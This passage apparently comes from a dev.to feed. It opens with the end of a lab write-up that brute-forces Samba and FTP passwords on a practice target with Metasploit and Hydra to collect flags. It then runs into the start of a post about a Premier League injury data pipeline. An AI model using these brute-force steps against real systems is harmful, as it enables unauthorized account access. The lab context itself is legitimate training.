&lt;p&gt;I used Metasploit to brute force passwords on the samba users, using the &lt;code&gt;smb_login&lt;/code&gt; module. I created a simple text file containing the usernames found to set it as the &lt;code&gt;user_file&lt;/code&gt;. The file containing the passwords to be tried was also provided. After setting all the required options and executing the exploit, the results provided the user and the weak password&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87fgey1bc8k4swfcyl8a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87fgey1bc8k4swfcyl8a.png" alt="weakuser" width="800" height="332"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hint says that the share with the same name as their username is the one at risk, so access the share using smbclient:&lt;br&gt;
&lt;code&gt;smbclient //target.ine.local/josh -U josh&lt;/code&gt;&lt;br&gt;
Again, download the file found and view its contents to get the second flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F07rwutaw1h3wmfoqdja6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F07rwutaw1h3wmfoqdja6.png" alt="flag2" width="720" height="160"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F520efukdjukkbr0myio3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F520efukdjukkbr0myio3.png" alt="flag2" width="625" height="94"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Flag 3
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Hint&lt;/strong&gt;: Follow the hint given in the previous flag to uncover this one.&lt;/p&gt;

&lt;p&gt;The hint for this flag was left in the previous flag, which suggested that there's an FTP service running, and we should check the banner. To find the service and the port its running on, I used nmap and found the service  running on port 5554.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9plfw4njm46aea2kdx82.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9plfw4njm46aea2kdx82.png" alt="nmap" width="800" height="230"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Trying to connect using the ftp command reveals that the accounts of ashley, alice and amanda have weak passwords and they should be changed. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmygjyqwajcghr726dk24.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmygjyqwajcghr726dk24.png" alt="ftpbanner" width="720" height="54"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next step is to bruteforce these users, and the tool I used is Hydra.&lt;br&gt;
I added the newly discovered usernames to the users.txt file I had created earlier and found the weak password:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8pii6hk023afh0ks3uv7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8pii6hk023afh0ks3uv7.png" alt="WeakUser2" width="800" height="108"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I found a module on metasploit, &lt;code&gt;ftp_login&lt;/code&gt; that can be used to do the same. I tried it out and the results were the same.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdwwjw0mshpvo9rzx7rud.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdwwjw0mshpvo9rzx7rud.png" alt="ftp_login" width="658" height="125"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now having the credentials, connecting to the ftp service and getting the flag was simple.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmnrz0if1zksdntkzhxro.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmnrz0if1zksdntkzhxro.png" alt="flag3" width="800" height="316"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 4
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint&lt;/strong&gt;: This is a warning meant to deter unauthorized users from logging in.&lt;br&gt;
Some research revealed that the SSH banner is the administrative message configured on a server to warn users before authentication. This hinted that the flag is in the banner. Trying to connect to the SSH service revealed the banner and the final flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fngsszw6kre4hzo7dg6xv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fngsszw6kre4hzo7dg6xv.png" alt="flag4" width="669" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>pentest</category>
    </item>
    <item>
      <title>Building an Automated Data Pipeline: Injuries vs Performance in the Premier League</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Wed, 22 Oct 2025 14:31:49 +0000</pubDate>
      <link>https://dev.to/james_kariuki/building-an-automated-data-pipeline-injuries-vs-performance-in-the-premier-league-53c7</link>
      <guid>https://dev.to/james_kariuki/building-an-automated-data-pipeline-injuries-vs-performance-in-the-premier-league-53c7</guid>
      <description>&lt;p&gt;Having spent the better part of the last two months learning the basics of data engineering, I wanted to build a project to test my understanding of the concepts. This article documents the process of building an automated ETL pipeline using Python, PostgreSQL, and Apache Airflow — including the bugs, the lessons learned, and the insights drawn from the data.&lt;/p&gt;

&lt;p&gt;I settled on analyzing whether player injuries contributed to the worst season in Manchester United’s recent history. The club cited injuries as a major reason for their poor performance, but I wasn’t convinced. Since data rarely lies, I decided to test that claim myself by combining injury data and team performance statistics, using my newly acquired data engineering skills.&lt;/p&gt;

&lt;p&gt;What started as a curiosity about one team quickly turned into a league-wide project.&lt;/p&gt;

&lt;h2&gt;
  
  
  Tech Stack
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Language: Python&lt;/li&gt;
&lt;li&gt;Database: PostgreSQL&lt;/li&gt;
&lt;li&gt;Orchestration: Apache Airflow&lt;/li&gt;
&lt;li&gt;Libraries: BeautifulSoup, Requests, psycopg2&lt;/li&gt;
&lt;li&gt;Tools: ScraperAPI&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The github repo to this project can be found &lt;a href="https://github.com/Menjez/prem-injury-analysis" rel="noopener noreferrer"&gt;here&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  ETL Process
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Data Extraction
&lt;/h3&gt;

&lt;p&gt;The project began by obtaining raw data from two main sources:&lt;br&gt;
&lt;a href="https://www.premierinjuries.com/newsroom/injury-data" rel="noopener noreferrer"&gt;Premier Injuries&lt;/a&gt; – for player injury data&lt;br&gt;
&lt;a href="https://understat.com/league/EPL" rel="noopener noreferrer"&gt;Understat&lt;/a&gt; – for match and player statistics&lt;/p&gt;
&lt;h4&gt;
  
  
  a. Injury Data
&lt;/h4&gt;

&lt;p&gt;To scrape injury data, I initially tried Selenium, but quickly ran into Cloudflare’s human verification challenge (the “I’m not a robot” checkbox).&lt;br&gt;
After experimenting with Playwright, I found a more reliable solution — ScraperAPI, a service that handles CAPTCHAs and rotating proxies automatically.&lt;/p&gt;

&lt;p&gt;Using ScraperAPI with BeautifulSoup, I extracted HTML content and parsed the table containing injury data:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;extract_injury_data&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;api_key&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;your_api_key&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;url&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://www.premierinjuries.com/injury-table.php&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;render&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; 
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://api.scraperapi.com/&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;soup&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BeautifulSoup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;html.parser&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Basic validation — check that the table or expected content exists
&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;soup&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;find&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;table&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;ValueError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Expected injury table not found in the page HTML.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;soup&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function fetches the rendered page via ScraperAPI and returns the parsed HTML tree for later processing.&lt;/p&gt;

&lt;h4&gt;
  
  
  b. Performance Data
&lt;/h4&gt;

&lt;p&gt;I then had to get the match statistics, so that I can compare the team's performance when certain players were unavailable due to injury to when they were fit and playing. I scraped this data from Understat website by extracting the JSON data that's embedded inside the JavaScript code on the webpage. I first sent the HTTP request, then parsed the HTML response from the server containing the entire webpage using BeautifulSoup. Next, I extracted the script tags from the page as this is how Understat embeds the match data. I then looped through each script tag looking for the datesData variable where match information is stored and extracted the json string. The JavaScript code on the page looks something like this :&lt;br&gt;
&lt;code&gt;var datesData = JSON.parse('{"2024-08-16":[{"id":"12345",...}]}');&lt;/code&gt;&lt;br&gt;
The loop extracts the JSON strings between the positions JSON.parse(' and ) thus extracts something like : &lt;code&gt;{"date":"2024-08-16"}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The resulting JSON string contains escaped characters such as apostrophes and backslashes that needed to be converted into actual characters before being parsed into a Python data structure that can actually be returned by the function. Extracting player statistics was a fairly similar process, only now I had to look for the playersData variable.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;extract_match_data&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;#Send HTTP request
&lt;/span&gt;    &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://understat.com/league/EPL/2024&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
    &lt;span class="n"&gt;res&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;#Parse response
&lt;/span&gt;    &lt;span class="n"&gt;soup&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BeautifulSoup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;lxml&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;#find and loop through &amp;lt;script&amp;gt; tags to find relevant info and extract JSON string
&lt;/span&gt;    &lt;span class="n"&gt;script_tags&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;soup&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;find_all&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;script&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;script&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;script_tags&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;datesData&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;script&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;raw_text&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;script&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;string&lt;/span&gt;
            &lt;span class="n"&gt;start&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;raw_text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;find&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;JSON.parse(&lt;/span&gt;&lt;span class="sh"&gt;'"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;JSON.parse(&lt;/span&gt;&lt;span class="sh"&gt;'"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;end&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;raw_text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;find&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"'&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;json_str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;raw_text&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="n"&gt;end&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="n"&gt;decoded_json&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json_str&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;utf8&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;unicode_escape&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;loads&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;decoded_json&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# raise error if no data is extracted
&lt;/span&gt;    &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;RuntimeError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Failed to extract match data from Understat.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Data Transformation
&lt;/h3&gt;

&lt;p&gt;Now that I had the raw data, I had to clean and validate the raw data so that I can use it for analysis. Some of the operations done on the data included:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Name Standardization: both team an player names are normalized to ensure consistent matching across both data sources.&lt;/li&gt;
&lt;li&gt;Foreign Key Resolution: Player and team names are mapped to database IDs using lookup tables&lt;/li&gt;
&lt;li&gt;Date Parsing: Various date formats are converted to ISO standard format&lt;/li&gt;
&lt;li&gt;Validation: Incomplete match entries are skipped&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After transformation, the data was structured into two main entities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Matches – containing match ID, date, teams involved, expected goals (xG), and result.&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Players and Player Stats – separating static player information from season performance data.&lt;br&gt;
Each player’s record included:&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Matches and minutes played&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Goals and assists&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Expected goals (xG) and expected assists (xA)&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Data Loading
&lt;/h3&gt;

&lt;p&gt;Transformed data was loaded into a PostgreSQL database using psycopg2.&lt;br&gt;
The schema consisted of the following tables:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;player_details&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;player_stats&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;matches&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;injuries&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To ensure integrity and efficiency, I implemented:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;UPSERT operations using ON CONFLICT for handling duplicate updates&lt;/li&gt;
&lt;li&gt;Batch inserts for efficiency&lt;/li&gt;
&lt;li&gt;Explicit transactions for commit/rollback safety&lt;/li&gt;
&lt;li&gt;Timestamp tracking for debugging and data lineage&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The database structure diagram below shows how the schema is set up.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff9kvn016uiqrrca381uo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff9kvn016uiqrrca381uo.png" alt="dbSchema" width="518" height="715"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Automation with Apache Airflow
&lt;/h2&gt;

&lt;p&gt;Running scripts manually became inefficient and error-prone, especially as data volumes grew.&lt;br&gt;
To automate the ETL process, I used Apache Airflow to define and schedule the workflow as a Directed Acyclic Graph (DAG).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nc"&gt;DAG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;dag_id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injury_etl_dag&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ETL pipeline for Understat and Premier Injuries data&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;schedule&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;timedelta&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;days&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;start_date&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;datetime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2024&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;catchup&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;default_args&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;default_args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;tags&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injury&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;understat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ETL&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;dag&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next, I added the tasks to be carried out and encapsulated each task in its own &lt;code&gt;@task()&lt;/code&gt; function. The data is stored temporarily using Airflow's Xcom and passed between tasks. I then specified the task dependencies and the workflow sequence.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;    &lt;span class="nd"&gt;@task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;extract_task&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;injury_html&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;extract_injury_data&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
